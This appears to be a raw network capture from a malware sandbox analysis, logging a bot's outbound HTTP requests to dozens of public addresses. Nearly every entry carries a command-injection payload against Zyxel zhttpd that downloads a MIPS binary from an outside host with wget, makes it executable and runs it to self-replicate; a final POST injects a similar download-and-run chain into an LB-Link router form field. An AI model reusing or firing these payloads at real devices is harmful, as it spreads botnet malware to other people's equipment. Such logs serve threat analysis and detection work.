                                                        Jan 28, 2024 10:12:39.150430918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1116192.168.2.143599277.172.112.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.150448084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1117192.168.2.143439217.225.104.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.150501966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1118192.168.2.144147462.223.110.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.150554895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1119192.168.2.144729618.104.224.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.150588989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1120192.168.2.1446632196.123.247.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.150634050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1121192.168.2.1458742102.163.206.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.150660038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1122192.168.2.1460288114.38.86.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.150717974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1123192.168.2.143721473.33.213.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.150753021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1124192.168.2.1444924204.85.255.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.150789976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1125192.168.2.1436350151.80.78.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.150834084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1126192.168.2.1456234132.192.25.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.150875092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1127192.168.2.1457320110.54.132.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.150929928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1128192.168.2.1437782194.122.52.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.150950909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1129192.168.2.145677861.164.195.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.150993109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1130192.168.2.144335877.244.5.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.151029110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1131192.168.2.143751296.239.210.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.151065111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1132192.168.2.144163888.84.27.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.151103020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1133192.168.2.1455798194.217.53.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.151149988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1134192.168.2.1449370194.177.5.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.151192904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1135192.168.2.1459340188.190.223.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.151241064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1136192.168.2.1443010212.160.134.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.151272058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1137192.168.2.145234279.238.36.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.151299953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1138192.168.2.145524637.191.180.133443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.151393890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1139192.168.2.1458440123.96.198.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.151422977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1140192.168.2.1450358188.35.84.242443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.151452065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1141192.168.2.1450060201.2.58.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.151495934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1142192.168.2.145042424.156.184.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.151521921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1143192.168.2.143468697.181.124.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.151571035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1144192.168.2.1458974118.188.244.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.151596069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1145192.168.2.1449350138.141.216.52443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.151658058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1146192.168.2.1438962106.51.210.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.151690960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1147192.168.2.1458796177.190.229.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.151736975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1148192.168.2.144574424.146.239.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.151771069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1149192.168.2.1453340120.102.252.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.151810884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1150192.168.2.1443706172.150.4.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.151858091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1151192.168.2.1449566141.17.53.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.151894093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1152192.168.2.1435530221.68.243.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.151935101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1153192.168.2.1456500166.238.13.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.151966095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1154192.168.2.1437524193.69.218.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.151994944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1155192.168.2.1438944105.12.35.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.152029037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1156192.168.2.1458946198.115.58.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.152055979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1157192.168.2.1457444152.23.34.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.152101040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1158192.168.2.1435292169.46.121.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.152138948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1159192.168.2.144564413.78.89.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.152168989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1160192.168.2.144928481.65.141.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.152209997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1161192.168.2.144892418.230.53.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.152251005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1162192.168.2.143562688.126.39.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.152282000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1163192.168.2.143580479.14.247.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.152334929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1164192.168.2.145842287.246.61.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.155534983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1165192.168.2.144239899.50.195.185443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.156002998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1166192.168.2.144065019.77.103.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.156032085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1167192.168.2.1459514191.80.132.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.156061888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1168192.168.2.1439118186.25.153.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.156106949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1169192.168.2.1440012101.148.98.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.156161070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1170192.168.2.1447080210.130.172.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.156208992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1171192.168.2.1460946165.100.31.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.156229973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1172192.168.2.1448614205.223.64.124443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.156265974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1173192.168.2.145550482.206.81.528080
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.204631090 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                        Jan 28, 2024 10:12:39.322776079 CET1286INHTTP/1.1 400 Bad Request
                                                        Server: squid
                                                        Mime-Version: 1.0
                                                        Date: Sun, 28 Jan 2024 09:12:39 GMT
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Length: 3556
                                                        X-Squid-Error: ERR_INVALID_URL 0
                                                        Vary: Accept-Language
                                                        Content-Language: en
                                                        X-Cache: MISS from ph-0f83112c
                                                        Via: 1.1 ph-0f83112c (squid)
                                                        Connection: close
